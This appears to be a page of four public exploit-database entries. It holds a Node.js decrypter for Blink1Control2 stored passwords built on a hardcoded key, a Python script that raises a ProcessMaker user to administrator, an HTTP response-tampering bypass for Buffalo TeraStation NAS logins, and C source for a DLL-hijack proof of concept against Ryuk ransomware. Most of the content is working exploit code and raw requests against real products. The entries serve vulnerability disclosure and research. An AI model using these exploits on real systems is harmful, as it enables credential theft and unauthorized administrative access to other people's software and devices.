<pre><code>// Exploit Title: Blink1Control2 2.2.7 - Weak Password Encryption<br />// Date: 2022-08-12<br />// Exploit Author: p1ckzi<br />// Vendor Homepage: https://thingm.com/<br />// Software Link: https://github.com/todbot/Blink1Control2/releases/tag/v2.2.7<br />// Vulnerable Version: blink1control2 <= 2.2.7<br />// Tested on: Ubuntu Linux 20.04, Windows 10, Windows 11.<br />// CVE: CVE-2022-35513<br />//<br />// Description:<br />// the blink1control2 app (versions <= 2.2.7) utilises an insecure method<br />// of password storage which can be found by accessing the /blink1/input url<br />// of the api server.<br />// password ciphertext for skype logins and email are listed<br />// and can be decrypted. example usage:<br />// node blink1-pass-decrypt <ciphertext><br />#!/usr/bin/env node<br />const {ArgumentParser} = require('argparse');<br />const simpleCrypt = require('simplecrypt');<br /><br />function exploit() {<br /> const BANNER = '\033[36m\n\<br /> _ _ _ _ _\n\<br /> | |__ | (_)_ __ | | _/ | _ __ __ _ ___ ___\n\<br /> | \'_ \\| | | \'_ \\| |/ | |_____| \'_ \\ / _` / __/ __|_____\n\<br /> | |_) | | | | | | <| |_____| |_) | (_| \\__ \\__ |_____|\n\<br /> |_.__/|_|_|_| |_|_|\\_|_| | .__/ \\__,_|___|___/\n\<br /> |_|\n\<br /> _ _\n\<br /> __| | ___ ___ _ __ _ _ _ __ | |_\n\<br /> / _` |/ _ \\/ __| \'__| | | | \'_ \\| __|\n\<br /> | (_| | __| (__| | | |_| | |_) | |_\n\<br /> \\__,_|\\___|\\___|_| \\__, | .__/ \\__|\n\<br /> |___/|_|\033[39m';<br /><br /> const PARSER = new ArgumentParser({<br /> description: 'decrypts passwords found at the /blink/input url '<br /> + 'of the blink1control2 api server (version <= 2.2.7 ).'<br /> });<br /> PARSER.add_argument('ciphertext', {<br /> help: 'encrypted password string to use', type: 'str'<br /> });<br /> let args = PARSER.parse_args();<br /><br /> // supplied ciphertext is decrypted with same salt, password, and method<br /> // used for encryption:<br /> try {<br /> let crypt = simpleCrypt({<br /> salt: 
'boopdeeboop',<br /> password: 'blink1control',<br /> method: 'aes-192-ecb'<br /> });<br /> let ciphertext = args.ciphertext;<br /> let decrypted = crypt.decrypt(ciphertext);<br /> console.log(BANNER);<br /> console.log('\033[32m[+] decrypted password:\033[39m');<br /> console.log(decrypted);<br /> }<br /> catch (TypeError) {<br /> console.log('\033[33m[!] the submitted hash was invalid.\033[39m');<br /> }<br /> finally {<br /> process.exit(1);<br /> }<br />}<br /><br />exploit()<br /> <br /></code></pre>
<pre><code># Exploit Title: ProcessMaker - User Profile Privilege Escalation<br /># Description: ProcessMaker before v3.5.4 was discovered to contain insecure permissions in the user profile page. This vulnerability allows attackers to escalate normal users to Administrators. <br /># Date: 20220822<br /># Exploit Author: Sornram Kampeera (Sornram9254)<br /># Vendor Homepage: https://www.processmaker.com<br /># Software Link: https://sourceforge.net/projects/processmaker/files/ProcessMaker/<br /># Version: ProcessMaker before v3.5.4 (Already Tested on 2.5.0, 2.5.2, 3.0 GA and 3.2.1)<br /># Tested on: Windows 11, Debian 11 (WSL2)<br /># CVE : CVE-2022-38577<br /><br />"""<br />Privilege Escalation replication.<br />for 2.5.0 - 3.0 GA:<br /> 1. Log in as normal user.<br /> 2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".<br /> 3. Refresh page to get new role.<br /><br />for 3.2.1 and before:<br /> 1. Log in as normal user.<br /> 2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"<br /> 3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"<br /> 4. 
Update role to escalation privileges using POST Body request:<br /> POST /sysworkflow/en/neoclassic/roles/roles_Ajax<br /> request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}<br />"""<br /><br />#!/usr/bin/python<br /># TODO: Optimize code [requests module], and Exception Handling.<br /># Replace the variables USERNAME, PASSWORD, and APP_URL.<br />import requests, json, re, argparse, sys<br />USER_AGENT = 'Mozilla/5.0'<br />APP_URL = "http://localhost:9994"<br />USERNAME = '__USER__'<br />PASSWORD = '__PASS__'<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument("action", type=str, help="Add or Delete role permission.", nargs="?", default=".")<br /><br />parser.add_argument("-a", "--add", action="store_true", help="Add role permission")<br />parser.add_argument("-d", "--delete", action="store_true", help="Delete role permission")<br />parser.add_argument("-l", "--list", action="store_true", help="List all roles")<br />args = parser.parse_args()<br />if args.add:<br /> action = "assign"<br />elif args.delete:<br /> action = "delete"<br />elif args.list:<br /> action = "list"<br /> print("All Permission UID")<br /> print("View more: https://wiki.processmaker.com/3.3/Roles")<br /> PERM_LIST = """<br />PER_UID: 00000000000000000000000000000001, PER_CODE: PM_LOGIN<br />PER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUP<br />PER_UID: 00000000000000000000000000000003, PER_CODE: PM_USERS<br />PER_UID: 00000000000000000000000000000004, PER_CODE: PM_FACTORY<br />PER_UID: 00000000000000000000000000000005, PER_CODE: PM_CASES<br />PER_UID: 00000000000000000000000000000006, PER_CODE: PM_ALLCASES<br />PER_UID: 00000000000000000000000000000007, PER_CODE: PM_REASSIGNCASE<br />PER_UID: 00000000000000000000000000000008, PER_CODE: PM_REPORTS<br />PER_UID: 00000000000000000000000000000009, PER_CODE: PM_SUPERVISOR<br />PER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCE<br />PER_UID: 
00000000000000000000000000000011, PER_CODE: PM_DASHBOARD<br />PER_UID: 00000000000000000000000000000012, PER_CODE: PM_WEBDAV<br />PER_UID: 00000000000000000000000000000013, PER_CODE: PM_DELETECASE<br />PER_UID: 00000000000000000000000000000014, PER_CODE: PM_EDITPERSONALINFO<br />PER_UID: 00000000000000000000000000000015, PER_CODE: PM_FOLDERS_VIEW<br />PER_UID: 00000000000000000000000000000016, PER_CODE: PM_FOLDERS_ADD_FOLDER<br />PER_UID: 00000000000000000000000000000017, PER_CODE: PM_FOLDERS_ADD_FILE<br />PER_UID: 00000000000000000000000000000018, PER_CODE: PM_CANCELCASE<br />PER_UID: 00000000000000000000000000000019, PER_CODE: PM_FOLDER_DELETE<br />PER_UID: 00000000000000000000000000000020, PER_CODE: PM_SETUP_LOGO<br />PER_UID: 00000000000000000000000000000021, PER_CODE: PM_SETUP_EMAIL<br />PER_UID: 00000000000000000000000000000022, PER_CODE: PM_SETUP_CALENDAR<br />PER_UID: 00000000000000000000000000000023, PER_CODE: PM_SETUP_PROCESS_CATEGORIES<br />PER_UID: 00000000000000000000000000000024, PER_CODE: PM_SETUP_CLEAR_CACHE<br />PER_UID: 00000000000000000000000000000025, PER_CODE: PM_SETUP_HEART_BEAT<br />PER_UID: 00000000000000000000000000000026, PER_CODE: PM_SETUP_ENVIRONMENT<br />PER_UID: 00000000000000000000000000000027, PER_CODE: PM_SETUP_PM_TABLES<br />PER_UID: 00000000000000000000000000000028, PER_CODE: PM_SETUP_LOGIN<br />PER_UID: 00000000000000000000000000000029, PER_CODE: PM_SETUP_DASHBOARDS<br />PER_UID: 00000000000000000000000000000030, PER_CODE: PM_SETUP_LANGUAGE<br />PER_UID: 00000000000000000000000000000031, PER_CODE: PM_SETUP_SKIN<br />PER_UID: 00000000000000000000000000000032, PER_CODE: PM_SETUP_CASES_LIST_CACHE_BUILDER<br />PER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINS<br />PER_UID: 00000000000000000000000000000034, PER_CODE: PM_SETUP_USERS_AUTHENTICATION_SOURCES<br />PER_UID: 00000000000000000000000000000035, PER_CODE: PM_SETUP_LOGS<br />PER_UID: 00000000000000000000000000000036, PER_CODE: PM_DELETE_PROCESS_CASES<br 
/>PER_UID: 00000000000000000000000000000037, PER_CODE: PM_EDITPERSONALINFO_CALENDAR<br />PER_UID: 00000000000000000000000000000038, PER_CODE: PM_UNCANCELCASE<br />PER_UID: 00000000000000000000000000000039, PER_CODE: PM_REST_API_APPLICATIONS<br />PER_UID: 00000000000000000000000000000040, PER_CODE: PM_EDIT_USER_PROFILE_FIRST_NAME<br />PER_UID: 00000000000000000000000000000041, PER_CODE: PM_EDIT_USER_PROFILE_LAST_NAME<br />PER_UID: 00000000000000000000000000000042, PER_CODE: PM_EDIT_USER_PROFILE_USERNAME<br />PER_UID: 00000000000000000000000000000043, PER_CODE: PM_EDIT_USER_PROFILE_EMAIL<br />PER_UID: 00000000000000000000000000000044, PER_CODE: PM_EDIT_USER_PROFILE_ADDRESS<br />PER_UID: 00000000000000000000000000000045, PER_CODE: PM_EDIT_USER_PROFILE_ZIP_CODE<br />PER_UID: 00000000000000000000000000000046, PER_CODE: PM_EDIT_USER_PROFILE_COUNTRY<br />PER_UID: 00000000000000000000000000000047, PER_CODE: PM_EDIT_USER_PROFILE_STATE_OR_REGION<br />PER_UID: 00000000000000000000000000000048, PER_CODE: PM_EDIT_USER_PROFILE_LOCATION<br />PER_UID: 00000000000000000000000000000049, PER_CODE: PM_EDIT_USER_PROFILE_PHONE<br />PER_UID: 00000000000000000000000000000050, PER_CODE: PM_EDIT_USER_PROFILE_POSITION<br />PER_UID: 00000000000000000000000000000051, PER_CODE: PM_EDIT_USER_PROFILE_REPLACED_BY<br />PER_UID: 00000000000000000000000000000052, PER_CODE: PM_EDIT_USER_PROFILE_EXPIRATION_DATE<br />PER_UID: 00000000000000000000000000000053, PER_CODE: PM_EDIT_USER_PROFILE_CALENDAR<br />PER_UID: 00000000000000000000000000000054, PER_CODE: PM_EDIT_USER_PROFILE_STATUS<br />PER_UID: 00000000000000000000000000000055, PER_CODE: PM_EDIT_USER_PROFILE_ROLE<br />PER_UID: 00000000000000000000000000000056, PER_CODE: PM_EDIT_USER_PROFILE_TIME_ZONE<br />PER_UID: 00000000000000000000000000000057, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_LANGUAGE<br />PER_UID: 00000000000000000000000000000058, PER_CODE: PM_EDIT_USER_PROFILE_COSTS<br />PER_UID: 00000000000000000000000000000059, PER_CODE: 
PM_EDIT_USER_PROFILE_PASSWORD<br />PER_UID: 00000000000000000000000000000060, PER_CODE: PM_EDIT_USER_PROFILE_USER_MUST_CHANGE_PASSWORD_AT_NEXT_LOGON<br />PER_UID: 00000000000000000000000000000061, PER_CODE: PM_EDIT_USER_PROFILE_PHOTO<br />PER_UID: 00000000000000000000000000000062, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_MAIN_MENU_OPTIONS<br />PER_UID: 00000000000000000000000000000063, PER_CODE: PM_EDIT_USER_PROFILE_DEFAULT_CASES_MENU_OPTIONS<br />PER_UID: 00000000000000000000000000000064, PER_CODE: PM_REASSIGNCASE_SUPERVISOR"""<br /> print(PERM_LIST)<br /> sys.exit()<br />else:<br /> print("Example Permission UID")<br /> SAMPLE_PERM_LIST = """>>> PER_UID: 00000000000000000000000000000002, PER_CODE: PM_SETUP<br />>>> PER_UID: 00000000000000000000000000000010, PER_CODE: PM_SETUP_ADVANCE<br />>>> PER_UID: 00000000000000000000000000000033, PER_CODE: PM_SETUP_PLUGINS<br /><br />python Processmaker-PoC.py --help<br />python Processmaker-PoC.py --list<br />python Processmaker-PoC.py --add 00000000000000000000000000000002<br />python Processmaker-PoC.py --delete 00000000000000000000000000000002"""<br /> print(SAMPLE_PERM_LIST)<br /> sys.exit()<br /><br />PERMISSION_UID = args.action<br /><br />loginData = "__notValidateThisFields__=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"<br />loginData += "DynaformRequiredFields=[{'name':'USR_USERNAME','type':'text','label':'User','validate':'Any','required':'0'}]&"<br />loginData += "__DynaformName__=sysLogin&"<br />loginData += "form[BROWSER_TIME_ZONE_OFFSET]=25200&"<br />loginData += "form[USR_PASSWORD]=" + PASSWORD + "&"<br />loginData += "form[USR_USERNAME]=" + USERNAME + "&"<br />loginData += "form[USR_PASSWORD_MASK]=&"<br />loginData += "form[USER_ENV]=workflow&"<br />loginData += "form[USER_LANG]=en"<br /><br />def getResponse(rMethod, rHeaders, rUrl,rData=None):<br /> SSL_VERIFY = False<br /> if rMethod == 'GET':<br /> response = requests.get(rUrl, headers=rHeaders, 
verify=SSL_VERIFY, allow_redirects=True)<br /> elif rMethod == "POST":<br /> response = requests.post(rUrl, data=rData, headers=rHeaders, verify=SSL_VERIFY, allow_redirects=True)<br /> else:<br /> print("Please choose correct answer")<br /> return response<br /><br />getCookie = getResponse('POST',<br /> {'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': USER_AGENT, 'Connection': 'close'},<br /> APP_URL + '/sys/en/neoclassic/login/sysLogin',<br /> loginData).cookies['PHPSESSID']<br />if getCookie is not None:<br /> getUserID = getResponse( 'GET',<br /> {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/users/usersInit')<br /> USER_ID = re.findall(r"USR_UID\s=\s\"(\w{32})\"", getUserID.text, re.MULTILINE)[0]<br /><br /> getRolesName = getResponse('POST',<br /> {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie,'Content-Type' : 'application/x-www-form-urlencoded', 'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/users/usersAjax',<br /> 'action=userData&USR_UID=' + USER_ID)<br /> <br /> getRolesList = getResponse( 'GET',<br /> {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc=')<br /><br /> getRolesPermission = getResponse('POST',<br /> {'User-Agent': USER_AGENT, 'Accept': '*', 'Cookie': 'PHPSESSID=' + getCookie, 'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID=ROLE_UID&type=show')<br /><br /> roleUID = re.findall(r"\"ROL_UID\":\"(\w{32})\",\"ROL_PARENT\":\"\",\"ROL_SYSTEM\":\"\w{32}\",\"SYS_CODE\":\"PROCESSMAKER\",\"ROL_CODE\":\"" + json.loads(getRolesName.text)['user']['USR_ROLE'] + "\"", getRolesList.text, re.MULTILINE)[0]<br /><br />def actionRoleResponse():<br /> actionRoleStatus = getResponse('POST',<br /> {'User-Agent': 
USER_AGENT,'Content-Type': 'application/x-www-form-urlencoded','Cookie': 'PHPSESSID=' + getCookie,'Connection': 'close'},<br /> APP_URL + '/sysworkflow/en/neoclassic/roles/roles_Ajax',<br /> 'request=' + action + 'PermissionToRoleMultiple&ROL_UID=' + roleUID + '&PER_UID=' + PERMISSION_UID)<br /> return actionRoleStatus.status_code<br /><br />if actionRoleResponse() == 200:<br /> print(action.capitalize() + " role successfully.")<br />elif actionRoleResponse() == 503:<br /> print("Role already exists.")<br />else:<br /> print("Error!")<br /></code></pre>
<pre><code># Exploit Title: Buffalo TeraStation Network Attached Storage (NAS) 1.66 - Authentication Bypass<br /># Date: 2022-08-11<br /># Exploit Author: JORDAN GLOVER<br /># Type: WEBAPPS<br /># Platform: HARDWARE<br /># Vendor Homepage: https://www.buffalotech.com/<br /># Model: TeraStation Series<br /># Firmware Version: 1.66<br /># Tested on: Windows 10 <br /><br /><br />An authentication bypass vulnerability in the web interface of a Buffalo TeraStation Series Network Attached Storage (NAS) device allows an unauthenticated malicious actor to gain administrative privileges.<br /><br />The web interface can be accessed via a web browser on port 80 or 443. Once accessed, you are presented with a login page that requires a username and password to authenticate to the NAS.<br /><br />Using a proxy tool to intercept the requests and responses, it was possible to intercept the login response and modify the JSON data contained within its body.<br /><br />If you modify "success" to 'true' and change "pageMode" to '0', this grants you authenticated access to the NAS with administrator privileges.<br /><br /><br />POC #1 Authentication Failure<br /><br />Request<br />POST /dynamic.pl HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 45<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/static/index.html<br /><br />bufaction=verifyLogin&user=Jordan&password=Jordan<br /><br /><br />Response<br />HTTP/1.1 200 OK<br />Content-type: text/html<br />Pragma: no-cache<br />Cache-Control: no-store, no-cache, must-revalidate<br />Cache-Control: post-check=0, pre-check=0<br />Expires: Thu, 01 Dec 1994 16:00:00 GMT<br />Connection: close<br />Date: Mon, 30 Jun 2008 
02:39:51 GMT<br />Server: lighttpd/1.4.32<br />Content-Length: 94<br /><br />{"success":false,"errors":[],"data":[{"sid":"zz69c1c4d83023374d0b786d7a5y69b0","pageMode":2}]}<br /><br />Incorrect Username or Password <br /><br /><br /><br />POC #2 Authentication Success<br /><br />Request<br />POST /dynamic.pl HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 45<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/static/index.html<br /><br />bufaction=verifyLogin&user=Jordan&password=Jordan<br /><br /><br />Intercepted Response<br />HTTP/1.1 200 OK<br />Content-type: text/html<br />Pragma: no-cache<br />Cache-Control: no-store, no-cache, must-revalidate<br />Cache-Control: post-check=0, pre-check=0<br />Expires: Thu, 01 Dec 1994 16:00:00 GMT<br />Connection: close<br />Date: Mon, 30 Jun 2008 02:39:51 GMT<br />Server: lighttpd/1.4.32<br />Content-Length: 94<br /><br />{"success":true,"errors":[],"data":[{"sid":"ag69c5f4x43093374d0c786k7a9y59h0","pageMode":0}]}<br /><br />Login Successful<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/5ac0f050f93f86e69026faea1fbb4450.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Trojan.Ransom.Ryuk.A<br />Vulnerability: Arbitrary Code Execution<br />Description: The ransomware looks for and executes DLLs in its current directory. Therefore, we can potentially hijack a vulnerable DLL to execute our own code, and control and terminate the malware pre-encryption. Once loaded, the exploit DLL checks whether the current directory is "C:\Windows\System32"; if not, we grab our process ID and terminate. All basic tests were conducted successfully in a virtual machine environment.<br />Family: Ryuk<br />Type: PE32<br />MD5: 5ac0f050f93f86e69026faea1fbb4450<br />Vuln ID: MVID-2022-0640<br />Disclosure: 09/19/2022<br /><br />Exploit/PoC:<br />1) Compile the following C code as "urlmon.dll"<br />2) Place the DLL in the same directory as the ransomware<br />3) Optional - Hide it: attrib +s +h "urlmon.dll"<br />4) Run the malware<br /><br />#include "windows.h"<br /><br />//By malvuln<br />//Purpose: Exploit Ryuk<br />/** DISCLAIMER:<br />Author is NOT responsible for any damages whatsoever by using this software or improper malware<br />handling. 
By using this code you assume and accept all risk implied or otherwise.<br />**/<br /><br />//gcc -c urlmon.c -m32<br />//gcc -shared -o urlmon.dll urlmon.o -m32<br /><br />BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){<br /> switch (reason) {<br /> case DLL_PROCESS_ATTACH:<br /> MessageBox(NULL, "Ryuk\nPWNED By MALVULN", "Code Exec PoC", MB_OK);<br /> TCHAR buf[MAX_PATH];<br /> GetCurrentDirectory(MAX_PATH, TEXT(buf));<br /> int rc = strcmp("C:\\Windows\\System32", TEXT(buf));<br /> if(rc != 0){<br /> HANDLE handle = OpenProcess(PROCESS_TERMINATE, FALSE, getpid());<br /> if (NULL != handle) { <br /> TerminateProcess(handle, 0);<br /> CloseHandle(handle);<br /> }<br /> }<br /> break;<br /> }<br /> return TRUE;<br />}<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>